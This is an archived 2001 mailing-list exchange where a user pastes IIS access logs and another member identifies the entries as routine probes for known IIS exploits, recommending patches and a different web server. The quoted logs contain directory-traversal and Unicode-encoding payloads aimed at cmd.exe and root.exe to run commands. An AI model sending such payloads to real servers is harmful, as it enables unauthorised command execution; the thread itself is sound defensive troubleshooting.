[ale] *OT* But, I need some help.

Jim Popovitch jimpop at yahoo.com
Sun Oct 21 17:17:47 EDT 2001 

Hi Jeb,

Those are "standard" attempts for know IIS exploits.  I get hundreds of them a
day on a few sites that I have,  of course my protection is Apache on Linux. ;)
 You mileage may vary.  I would suggest that you swiftly apply all known
service packs from the Microsoft website, as well as double check the BugTraq
archives to make sure you have everything covered.  Next I would suggest that
you follow the Gartner Group's advice about replacing IIS (this doesn't
necessarily have to be Apache on Linux).

-Jim P.
 
--- Jeb <jeb_barger at yahoo.com> wrote:
> 
> 
> After going through my logs on my winboze iis server, I have script kiddies
> (i think), hitting my boxen.
> However, I don't know what it is.  Could you lend me some of your advice?
> 
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /scripts/root.exe
> /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET /MSADC/root.exe
> /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /c/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /d/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:04 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
> /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:05 65.28.91.203 - 65.28.182.80 80 GET
> /winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
> 2001-10-21 20:55:06 65.28.91.203 - 65.28.182.80 80 GET
> /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -
> 
> Thanks!
> 
> 
> _________________________________________________________
> Do You Yahoo!?
> Get your free @yahoo.com address at http://mail.yahoo.com
> 
> 
> ---
> This message has been sent through the ALE general discussion list.
> See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
> sent to listmaster at ale dot org.
> 


__________________________________________________
Do You Yahoo!?
Make a great connection at Yahoo! Personals.
http://personals.yahoo.com

---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be 
sent to listmaster at ale dot org.

More information about the Ale mailing list